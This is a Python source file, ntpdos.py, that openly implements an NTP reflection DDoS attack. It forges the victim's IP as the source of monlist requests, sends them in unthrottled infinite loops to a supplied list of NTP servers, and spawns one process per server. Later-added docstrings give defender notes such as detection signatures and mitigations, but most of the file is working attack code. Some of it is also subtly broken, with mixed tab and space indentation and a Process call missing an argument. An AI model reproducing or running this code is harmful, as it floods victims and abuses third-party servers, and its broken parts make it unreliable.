path: root/ntpdos.py
blob: 03391e81e38fb1ef85ec076001319d8d51a4d63a (plain)
from multiprocessing import Process
import socket
from sys import *
from struct import *

"""
    (c) Alexander Pickering 2013-2016
    With code from http://www.binarytides.com/

    A DDOS attack that leverages NTP servers,
    Requires an input file, with each NTP server on a different line
"""

class targetOne():
    """Craft one UDP datagram to port 123 with a forged source address and resend it forever.

    The IP source field carries ``victim`` and the destination field carries
    ``target``, so any reply the NTP server produces is delivered to
    ``victim`` instead of to the sending host (reflection).

    Defender notes, all read off the values packed below:
      * The 8-byte payload begins 17 00 03 2a: an NTP mode 7 (private)
        request, implementation 3, request code 42 -- the ntpd "monlist"
        query, whose replies can be far larger than the request. Inbound
        UDP/123 traffic carrying this prefix is a usable detection signature.
      * Every datagram is packed with the same IP identification (54321),
        TTL (255) and UDP source port (0); these constants can help cluster
        traffic from this script in packet captures.
      * On the server side, ntpd stops answering this query when it is
        configured with ``restrict ... noquery`` or ``disable monitor``.
        On the network side, source-address validation (BCP 38) drops
        datagrams whose source address does not belong to the sender.
      * Opening a SOCK_RAW socket normally requires elevated privileges on
        the sending host.
    """

    def __init__(self, target, victim):
        """Build the datagram once, print it, then send it in an unconditional loop.

        Args:
            target: IPv4 address string of the NTP server; packed as the IP
                destination and used as the ``sendto`` address.
            victim: IPv4 address string packed as the IP source.

        This constructor never returns: it ends in ``while(True)``.
        """
        # NTP mode 7 request, implementation 3, request code 42 ("monlist").
        payload = b'\x17\x00\x03\x2a\x00\x00\x00\x00'
        # Constant IP identification value; identical in every datagram sent.
        gid = 54321

        s = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_RAW) #Create the raw socket; the IP header is supplied by this code

        ipheader = pack('!BBHHHBBH4s4s',
              85, #IHL version
              0, #Type of service
              0, #Total length, will automatically fill in correct length
              gid, #Global id of this packet
              0, #Fragment offset
              255, #Time to live
              socket.IPPROTO_UDP, #Protocol
              0, #Header checksum, will automatically fill
              socket.inet_aton(victim), #Source address field: the victim's address, not this host's, so replies go there
              socket.inet_aton(target)) #Destination address field: the NTP server

        # First pass at the UDP header, with the checksum field still zero;
        # it only serves as input to the checksum computation below.
        udpheader = pack('!HHHH',
                         0, #Source port
                         123, #Destination port for NTP
                         0, #Length, automatically filled in
                         0) #Checksum, filled in later

        # Pseudo-header used only for the UDP checksum; it is never sent.
        pseudoheader = pack('!4s4sBBH',
                           socket.inet_aton(victim), #Spoofed source address
                           socket.inet_aton(target), #The NTP server
                           0, #Placeholder byte
                           socket.IPPROTO_UDP,
                           len(udpheader+payload)) #Length of UDP header plus payload

        brokepacket = pseudoheader + udpheader + payload #Checksum input only; not a packet that is sent

        check = self.checksum(brokepacket) #Get the checksum

        udpheader = pack('!HHHH',
                         0,
                         123,
                         0,
                         check) #Re-create the udp header, now carrying the computed checksum

        packet = ipheader + udpheader + payload #The final packet to send

        print("Sending packet:\n" + str(packet))
        print("Attacking!!!\n press ctrl+c to stop")

        # No rate limit, counter or exit condition: the same bytes are sent
        # until the process is interrupted or sendto raises.
        while(True):
            s.sendto(packet,(target,0)) #Send the packet

    ##Checksum function taken from http://www.binarytides.com/
    def checksum(self, msg):
        """Return a 16-bit one's-complement checksum of ``msg``.

        Bytes are consumed in pairs, with the first byte of each pair taken
        as the low-order byte of the 16-bit word. The running sum is folded
        back into 16 bits and then complemented.

        ``msg`` is indexed at ``i+1`` for every even ``i``, so an odd-length
        input would index past the end of the buffer.
        """
        s = 0
        for i in range(0,len(msg),2):
            # ord(chr(...)) leaves an int byte value unchanged.
            par1 = ord(chr(msg[i]))
            par2 = ord(chr(msg[i+1]))
            w=par1 + (par2 << 8)
            s=s+w
        # Fold the carries above bit 15 back into the low 16 bits.
        s=(s>>16)+(s&0xffff);
        s=s+(s>>16);
        # One's complement, truncated to 16 bits.
        s=~s&0xffff
        return s

class ntpspam():
    """Read a list of NTP server addresses and start one worker process per address."""

    def f(self, victim = None, filename = None):
        """Parse the server list and spawn a ``Process`` for each entry.

        Args:
            victim: address handed on to the worker; read from ``input()``
                when it is None.
            filename: path of the server list; read from ``input()`` when it
                is None.

        The file is opened unbuffered in binary mode and read one byte at a
        time. An entry ends at a carriage return followed by a newline; the
        text still accumulated at end of file is treated as the last entry.
        Started processes are kept in a local dict and are never joined or
        terminated here.
        """
        if(victim == None):
            victim = input("IP of victim:\n")
		if(filename == None):
			ntpfilename = input("Name of file containting ntp servers\n")
		else:
			ntpfilename = filename
		ntpfile = open(ntpfilename, 'rb', buffering = 0)
        done = False
        ip = ''        # characters of the entry currently being read
        returned = False  # True once a carriage return has been seen
        x = 0          # next key in the processes dict
        processes = {}
        while(not done):
            char = ntpfile.read(1)
            # str() of a bytes object yields its repr (b'...'); the slice
            # drops the b' prefix and the closing quote, so a newline byte
            # becomes the two-character text backslash-n and EOF becomes ''.
            char = str(char)[2:-1]
            if(char == '\\n' and returned):
                print("useing ntp " + ip)
                returned = False
                p = Process(target = self.makeOne, args=(ip,))
                p.start()
                processes[x] = p
                x += 1
                ip = ''
            elif(char == '\\r'):
                returned = True
            elif(not char == ''):
                ip += char
            else:
                # Empty read: end of file. Start a worker for whatever is
                # left in ip and leave the loop.
                done = True
                print("done,useing ntp " + ip)
                returned = False
                p = Process(target = self.makeOne, args=(ip,victim,))
                p.start()
                processes[x] = p
                x += 1
                ip = ''
        ntpfile.close()

    def makeOne(self, ip, victim):
        """Process entry point: construct ``targetOne(ip, victim)``.

        The ``targetOne`` constructor ends in an unconditional loop, so this
        call does not return.
        """
        one = targetOne(ip, victim)

# Script entry point. With no arguments passed to f(), both the victim
# address and the server-list filename are read interactively from stdin.
if(__name__ == '__main__'):
    try:
        n = ntpspam()
        n.f()
    except Exception as e:
        # Host artifact for incident response: only the exception message
        # (no traceback) is written to crash.log in the current working
        # directory, overwriting any earlier file. KeyboardInterrupt is not
        # an Exception subclass, so ctrl+c does not reach this handler.
        crash = open('crash.log', 'w')
        crash.write(str(e))
        crash.close()